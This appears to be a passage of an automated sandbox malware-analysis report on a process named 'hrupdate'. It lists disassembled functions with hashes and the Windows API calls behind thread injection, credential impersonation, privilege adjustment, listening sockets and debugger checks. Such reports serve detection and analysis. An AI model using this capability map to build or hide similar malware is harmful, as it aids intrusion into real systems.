                                      • Opcode ID: 3b7383c0a64973effe46d03d708316799d76624455a7010247f3b4afdc3d410c
                                      • Instruction ID: bc465f471f5d261f6b5d68f9f57fa09cacdbbbac6e68b66630c9dcb53c5d5edc
                                      • Opcode Fuzzy Hash: 3b7383c0a64973effe46d03d708316799d76624455a7010247f3b4afdc3d410c
                                      • Instruction Fuzzy Hash: 400184A25021647ADF613EA29C88CEB3EDCEF272F8B000018F90D85151F56A9D24C6F4
                                      APIs
                                      • _malloc.LIBCMT ref: 046AA0EF
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap_malloc
                                      • String ID:
                                      • API String ID: 501242067-0
                                      • Opcode ID: ad8a498fba999602ffd9deb04c9b15af916676bd3c418e5468ca25e17563959e
                                      • Instruction ID: ea2744c67a1ae8dcd135511c495c51b794e48a67399bf2849dacbbae745107df
                                      • Opcode Fuzzy Hash: ad8a498fba999602ffd9deb04c9b15af916676bd3c418e5468ca25e17563959e
                                      • Instruction Fuzzy Hash: 94E0BF72208A019FE768CF6CF844616B7E1AB85734B24CE3FD09AD7794E634E8918B14
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896804996.0000000000B10000.00000020.00000800.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b10000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: bc9552c2b311404d09daf3ba76ae2ef43201ff9fdafa701454f815beffcc5e84
                                      • Instruction ID: 3ae39de76a14803aa33e4869a6e045b9adf91af7ce5611a8f7c32783169ca313
                                      • Opcode Fuzzy Hash: bc9552c2b311404d09daf3ba76ae2ef43201ff9fdafa701454f815beffcc5e84
                                      • Instruction Fuzzy Hash: 24F090B1914208EBDB04FF54E845AD6B7A9AB5034CF84C1A4F80E4F202C771EAC0CBC0
                                      APIs
                                      • Sleep.KERNEL32(046D6318,00000000,0469498F), ref: 04699ACF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 1280178566e06b75fd48ba5c24b2b841cb9c2f37d9457202bcf53a275211dca3
                                      • Instruction ID: 9ce966c649fda40707cd2451fd84485aa1f337625f46b0e74adb80589e3ab9c3
                                      • Opcode Fuzzy Hash: 1280178566e06b75fd48ba5c24b2b841cb9c2f37d9457202bcf53a275211dca3
                                      • Instruction Fuzzy Hash: 90D0A9D0000A0228EE086720A814B4B12CCCF21336B24000EF009C8B80FFA8EC898029
                                      APIs
                                      • _malloc.LIBCMT ref: 0469984B
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • _memset.LIBCMT ref: 04699857
                                        • Part of subcall function 046958BF: _malloc.LIBCMT ref: 046958C5
                                        • Part of subcall function 0469590F: htonl.WS2_32(00000000), ref: 04695915
                                      • _strncmp.LIBCMT ref: 046998A6
                                      • GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 046998B4
                                        • Part of subcall function 046AE93E: __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046AE93E: ___sbh_find_block.LIBCMT ref: 046AE967
                                        • Part of subcall function 046AE93E: ___sbh_free_block.LIBCMT ref: 046AE976
                                        • Part of subcall function 046AE93E: HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                        • Part of subcall function 046AE93E: GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 046998E5
                                      • GetLastError.KERNEL32 ref: 046998F2
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0469993E
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0469994E
                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 046999E1
                                      • FindClose.KERNEL32(00000000), ref: 046999F0
                                        • Part of subcall function 04695A19: _vwprintf.LIBCMT ref: 04695A23
                                        • Part of subcall function 04695A19: _vswprintf_s.LIBCMT ref: 04695A47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
                                      • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                      • API String ID: 2804257087-1754256099
                                      • Opcode ID: c980ae5e561b8d58e5e8802fbeaa0eda83f3dbeff68df0d1881a28f6b19b1702
                                      • Instruction ID: 18ec15d3394b0f4056e268e66a72c23b08c73e763daa23b0ecd0ab6753a6b93f
                                      • Opcode Fuzzy Hash: c980ae5e561b8d58e5e8802fbeaa0eda83f3dbeff68df0d1881a28f6b19b1702
                                      • Instruction Fuzzy Hash: E4511DB2D00129BAEF11EBE5DC45EFF77FCAF08715F04041AB605A1181FA79AE448B65
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,0469AF20,00000000), ref: 0469B1F3
                                      • GetProcAddress.KERNEL32(00000000), ref: 0469B1FA
                                        • Part of subcall function 0469B122: _malloc.LIBCMT ref: 0469B141
                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0469B229
                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 0469B23E
                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0469B286
                                      • Sleep.KERNEL32(000000C8,00000004,00000000), ref: 0469B29D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread32$AddressCreateFirstHandleModuleNextProcSleepSnapshotToolhelp32_malloc
                                      • String ID: NtQueueApcThread$ntdll
                                      • API String ID: 147937454-1374908105
                                      • Opcode ID: aea948428916e17b7c9a8048cc87b57a0d486cd9a1c300920fe39641eb1e0d30
                                      • Instruction ID: cedf0a0f4cc6afb152039b8725b1e495dc6160310a4a87791cd31e4492cbd302
                                      • Opcode Fuzzy Hash: aea948428916e17b7c9a8048cc87b57a0d486cd9a1c300920fe39641eb1e0d30
                                      • Instruction Fuzzy Hash: D2414CB2900209BFEF10EFA5D8859BEBBBDEB14704F104429EA0196240F6B1BE55CF65
                                      APIs
                                      • _malloc.LIBCMT ref: 0469F551
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • __snprintf.LIBCMT ref: 0469F562
                                      • FindFirstFileA.KERNEL32(00000000,046996DC,?,0469F633,046996DC,?,Function_0000565A), ref: 0469F56F
                                        • Part of subcall function 046AE93E: __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046AE93E: ___sbh_find_block.LIBCMT ref: 046AE967
                                        • Part of subcall function 046AE93E: ___sbh_free_block.LIBCMT ref: 046AE976
                                        • Part of subcall function 046AE93E: HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                        • Part of subcall function 046AE93E: GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      • _malloc.LIBCMT ref: 0469F5AE
                                      • __snprintf.LIBCMT ref: 0469F5C3
                                        • Part of subcall function 0469F507: _malloc.LIBCMT ref: 0469F512
                                        • Part of subcall function 0469F507: __snprintf.LIBCMT ref: 0469F526
                                      • FindNextFileA.KERNEL32(000000FF,046996DC,?,?,?,?,?,?,?), ref: 0469F5F0
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 0469F5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                                      • String ID: %s\*
                                      • API String ID: 1254174322-766152087
                                      • Opcode ID: c622cf919be442eeb5601df4503eb4e3803a3a19ca408504157e91b9bc63f903
                                      • Instruction ID: 995a6217cd052b4a7d5744c4ce388edbd4496eaf28d8fd0822b88d9655297c2d
                                      • Opcode Fuzzy Hash: c622cf919be442eeb5601df4503eb4e3803a3a19ca408504157e91b9bc63f903
                                      • Instruction Fuzzy Hash: AC21B332540209BBEF115F61CC49ABF3B6DEF41265F198018F809A6251FBB1AD119F64
                                      APIs
                                      • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,04698FB9,C2E8296A,83FFFFD9,7591E010,046990F0), ref: 04698DBA
                                      • GetLastError.KERNEL32 ref: 04698DCC
                                      • _memset.LIBCMT ref: 04698E15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorLastLogonProcessWith_memset
                                      • String ID: sysnative$system32
                                      • API String ID: 2584212486-2461298002
                                      • Opcode ID: 5e930242b40a44de7735de1a2425dcf8396591b31e7c8447afad6e6cca29e646
                                      • Instruction ID: b03aed80adcb0cb0c8dd355d3ddbde5ae23858669d7d6c5252d6d008781b8854
                                      • Opcode Fuzzy Hash: 5e930242b40a44de7735de1a2425dcf8396591b31e7c8447afad6e6cca29e646
                                      • Instruction Fuzzy Hash: 0F312776600211ABDF22AF64DC18BE73BADEB1A300F184055FA85D7212FAB5ED548B94
                                      APIs
                                      • htonl.WS2_32 ref: 0469D49E
                                      • htons.WS2_32(?), ref: 0469D4AE
                                      • socket.WS2_32(00000002,00000002,00000000), ref: 0469D4C4
                                      • closesocket.WS2_32(00000000), ref: 0469D4D1
                                      • bind.WS2_32(00000000,?,00000010), ref: 0469D4FF
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0469D516
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                      • String ID:
                                      • API String ID: 3910169428-0
                                      • Opcode ID: b608402f0ceaf5de0d6ddf9a3e6a2abbbb2ebac2acc26c0e05e3ac3f990a3b4d
                                      • Instruction ID: 29edf621c81ae3822ce1c77d1eb85b2dac61e6b1e8a5e717e30629a135fdee56
                                      • Opcode Fuzzy Hash: b608402f0ceaf5de0d6ddf9a3e6a2abbbb2ebac2acc26c0e05e3ac3f990a3b4d
                                      • Instruction Fuzzy Hash: 8C11B271A003146AEB10ABB89C45BAEB6ECDF09728F10453AF654E71C0F6B4BD4587A9
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 04697BF9
                                      • Sleep.KERNEL32(000003E8), ref: 04697C69
                                      • GetTickCount.KERNEL32 ref: 04697C6F
                                      • Sleep.KERNEL32(000003E8), ref: 04697C82
                                      • closesocket.WS2_32(00000000), ref: 04697C89
                                      • send.WS2_32(00000000,?,?,00000000), ref: 04697C9C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountSleepTick$closesocketsend
                                      • String ID:
                                      • API String ID: 1472970430-0
                                      • Opcode ID: f2b0f623d8a3b2b5517e8a24d1167eaab5473cd4e2462c4c36e0e43509a8618c
                                      • Instruction ID: 42e67b664ccca51f4fe1d63ffa24afad1dbe62de2607edc6a9a339574a644663
                                      • Opcode Fuzzy Hash: f2b0f623d8a3b2b5517e8a24d1167eaab5473cd4e2462c4c36e0e43509a8618c
                                      • Instruction Fuzzy Hash: C8118472D00218EFEF01ABF4DC808DD7BBCEF04225F10053AE211A6190FAB5AA449B55
                                      APIs
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0469D3B7
                                      • htons.WS2_32(?), ref: 0469D3D3
                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0469D3EC
                                      • closesocket.WS2_32(00000000), ref: 0469D3F7
                                      • bind.WS2_32(00000000,?,00000010), ref: 0469D405
                                      • listen.WS2_32(00000000,?), ref: 0469D413
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: bindclosesockethtonsioctlsocketlistensocket
                                      • String ID:
                                      • API String ID: 1767165869-0
                                      • Opcode ID: a218659402dad6ae6a894665ed8e242990da67fb562982b30a923339fbc82cb0
                                      • Instruction ID: 4ce2826a0eb83b8b0692cd9a29b941caa7a0627244ab93692df6b54550c99809
                                      • Opcode Fuzzy Hash: a218659402dad6ae6a894665ed8e242990da67fb562982b30a923339fbc82cb0
                                      • Instruction Fuzzy Hash: 8E01B531600628B7DF116FA88C05AEFBBADDF42755F204126FA40E6181F7B4AD4187E9
                                      APIs
                                        • Part of subcall function 046A4070: RevertToSelf.ADVAPI32(00000100,046A4609,00000000,?,?,04695B6E,?,00000000,00000000,00000000,00000100,00000100), ref: 046A4088
                                      • LogonUserA.ADVAPI32(?,?,?,00000009,00000003,046DAF5C), ref: 046A43EB
                                      • GetLastError.KERNEL32 ref: 046A43F5
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,046990F0,?,04698F09,046990F0,?,00000400), ref: 0469764B
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,046990F0,04698F09,?,04698F09,046990F0,?,00000400,?,?,?,?,046990F0), ref: 04697664
                                        • Part of subcall function 046958BF: _malloc.LIBCMT ref: 046958C5
                                        • Part of subcall function 04695A19: _vwprintf.LIBCMT ref: 04695A23
                                        • Part of subcall function 04695A19: _vswprintf_s.LIBCMT ref: 04695A47
                                        • Part of subcall function 04695A58: _memset.LIBCMT ref: 04695A66
                                      • ImpersonateLoggedOnUser.ADVAPI32 ref: 046A440F
                                      • GetLastError.KERNEL32 ref: 046A4419
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc$ByteCharErrorLastMultiUserWide$ImpersonateLoggedLogonRevertSelf_memset_vswprintf_s_vwprintf
                                      • String ID: %s\%s
                                      • API String ID: 744593125-4073750446
                                      • Opcode ID: 6910ab402f794f729f7ded9293b5aaf242aea12156ae8fc37feec006016cce3d
                                      • Instruction ID: ccfba1401f2a7f1d426fe30e7b5d51865ee29736d1ed3f9d2c765171c6f7bc3a
                                      • Opcode Fuzzy Hash: 6910ab402f794f729f7ded9293b5aaf242aea12156ae8fc37feec006016cce3d
                                      • Instruction Fuzzy Hash: 0631A7B2D05208BBEF017FE0EC45EAA3BADEB04719F144028B90495251FBB96D11DFA5
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 046BA36D
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 046BA382
                                      • UnhandledExceptionFilter.KERNEL32(046C1C54), ref: 046BA38D
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 046BA3A9
                                      • TerminateProcess.KERNEL32(00000000), ref: 046BA3B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 52fd3d9ecdd2c7950539492786b6b91943a51f075130d0451df8e56cd78ea6ad
                                      • Instruction ID: 61b659febe48617ed39fc266c94dc79d65c4f930be13487bb974748655bc391f
                                      • Opcode Fuzzy Hash: 52fd3d9ecdd2c7950539492786b6b91943a51f075130d0451df8e56cd78ea6ad
                                      • Instruction Fuzzy Hash: D721DFB9D022059FDB00DF69F545AA43BB4FB08308F58B01AE4898BB41F77DACA18F45
                                      APIs
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 046A4FB6
                                      • closesocket.WS2_32(00000000), ref: 046A4FC3
                                      • htons.WS2_32(?), ref: 046A4FD4
                                      • bind.WS2_32(00000000,?,00000010), ref: 046A4FEB
                                      • listen.WS2_32(00000000,00000078), ref: 046A4FFC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: bindclosesockethtonslistensocket
                                      • String ID:
                                      • API String ID: 564772725-0
                                      • Opcode ID: bcc18c4c3e267716dc01509656a40a2512f6f55d19c0d3266e71207be3a5b7c9
                                      • Instruction ID: f56052b6a3a9c912b0d63ac5f8b9134470556e8872c11b244d7f0af1e8acae78
                                      • Opcode Fuzzy Hash: bcc18c4c3e267716dc01509656a40a2512f6f55d19c0d3266e71207be3a5b7c9
                                      • Instruction Fuzzy Hash: D2F0D135950A1476EB107BB49C0AFEE3228AF41328F404305F961A91D2FBF4B9559FEA
                                      APIs
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 04698851
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04698874
                                      • GetLastError.KERNEL32 ref: 0469887E
                                        • Part of subcall function 04695A19: _vwprintf.LIBCMT ref: 04695A23
                                        • Part of subcall function 04695A19: _vswprintf_s.LIBCMT ref: 04695A47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
                                      • String ID: %s
                                      • API String ID: 2004037343-620797490
                                      • Opcode ID: 295375800ba6e8334805cf54146f7c0022d252f57c9064e51e3577d7dd4e99f2
                                      • Instruction ID: 0b4034de3eb981c660dbd838bf88d0ff8544fad32bb119a8ffb1648c8c900f76
                                      • Opcode Fuzzy Hash: 295375800ba6e8334805cf54146f7c0022d252f57c9064e51e3577d7dd4e99f2
                                      • Instruction Fuzzy Hash: B4116072910129BBEF11AFA5DD449EFBBFCEF05294F100426FA05F2150E675EE048AB1
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,046A3FFF,00000000,00000000,000000FF,00000080,00000000,00000000,?,?,046949A6), ref: 046A2FA2
                                      • NtCreateThreadEx.NTDLL(046949A6,001FFFFF,00000000,?,?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 046A2FC4
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$CreateCurrentProcessThread
                                      • String ID:
                                      • API String ID: 4175059785-0
                                      • Opcode ID: 3abcc3247656768b8e43eb87e453ade64a3f0051260e519a4e2bda0c75d2cd32
                                      • Instruction ID: 1fc068066a1ba788218a192ec4e9e91f86b9fe1f03acc9344beda5f210f34abe
                                      • Opcode Fuzzy Hash: 3abcc3247656768b8e43eb87e453ade64a3f0051260e519a4e2bda0c75d2cd32
                                      • Instruction Fuzzy Hash: 9441A9B1A425107BEB716E51DC45DAB3EDCEF267A4F000018F90C55281F679AD60CAF5
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,046DA64C,00000000,?,?,?,046960AF,00000000,046DA64C,?,00000001,000002F0,?,00000000,0469632B,?), ref: 046A2AFB
                                      • NtProtectVirtualMemory.NTDLL(?,?,00000000,?,046DA64C), ref: 046A2B15
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$CurrentMemoryProcessProtectVirtual
                                      • String ID:
                                      • API String ID: 1381917366-0
                                      • Opcode ID: 636f89647d5b4160c591606c8d343990e60d36ffe2b3a16cb5e5a761644cb557
                                      • Instruction ID: a32caa4f4055f59c499a920c7b251280046cfe82024362468d9e02f97209876c
                                      • Opcode Fuzzy Hash: 636f89647d5b4160c591606c8d343990e60d36ffe2b3a16cb5e5a761644cb557
                                      • Instruction Fuzzy Hash: 3941C3B1A41105BBEF25AF50DC85DAF3FADEB25398F000058F90892241F679ED64CFA0
                                      APIs
                                      • GetCurrentProcess.KERNEL32(000002F0,?,00000000,?,?,?,046963B2,00000000,00000000,000002F0,00003000,?,?,00000008,00000001), ref: 046A2941
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,00003000,00000000,046963B2), ref: 046A295C
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$AllocateCurrentMemoryProcessVirtual
                                      • String ID:
                                      • API String ID: 2672565004-0
                                      • Opcode ID: 2cf6eb09f3ec50b11d8bda6da1bc1e1f562faef97b06f1cf1b5341f6f18f20fe
                                      • Instruction ID: c17751aee24e2125a37cc2996851835b9c02b3ee250b0cd6843eb87cf3b52d3a
                                      • Opcode Fuzzy Hash: 2cf6eb09f3ec50b11d8bda6da1bc1e1f562faef97b06f1cf1b5341f6f18f20fe
                                      • Instruction Fuzzy Hash: ED418EB1941114BFEF25EF91EC55DAF3FADEF267A4B000059F80892251F675AD20CBA1
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469CC00
                                      • Sleep.KERNEL32(000003E8), ref: 0469CC50
                                      • GetTickCount.KERNEL32 ref: 0469CC56
                                      • WSAGetLastError.WS2_32 ref: 0469CC5C
                                        • Part of subcall function 0469CBAB: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0469CBBD
                                        • Part of subcall function 0469C387: _memset.LIBCMT ref: 0469C3A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$ErrorLastSleep_memsetioctlsocket
                                      • String ID:
                                      • API String ID: 3301373915-0
                                      • Opcode ID: d544e62be36a6ef1609ec2d1daef69ca0f48bf3d134521a633aaa4cedd1dde19
                                      • Instruction ID: 9630df9f5c5f6e3369aa8bc4d7a560af1dccb0615774062850fbbfec87591e58
                                      • Opcode Fuzzy Hash: d544e62be36a6ef1609ec2d1daef69ca0f48bf3d134521a633aaa4cedd1dde19
                                      • Instruction Fuzzy Hash: CE11C673C00109ABEF107BB4EC419EE7BEDDB44268F240026F600A7190FAA4BD865699
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,75922E90,?,?,?,0469CE90), ref: 046A45CE
                                      • CheckTokenMembership.ADVAPI32(00000000,?,0469CE90,?,?,?,0469CE90), ref: 046A45E3
                                      • FreeSid.ADVAPI32(?,?,?,?,0469CE90), ref: 046A45F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: 7e347504e0d86d94d12591252da590fb3b9e00735db146bfb12d0c5806d19d96
                                      • Instruction ID: 28aecef368c446d64161f4a3cc402406cba399f4f6448f0df2d0835e1a7ea6b4
                                      • Opcode Fuzzy Hash: 7e347504e0d86d94d12591252da590fb3b9e00735db146bfb12d0c5806d19d96
                                      • Instruction Fuzzy Hash: 6C011D76945288FEDB01DBE88984AEDBF78EB25200F44449AA501A3242E6709B18DB25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: $<$abcdefghijklmnop
                                      • API String ID: 0-2431890337
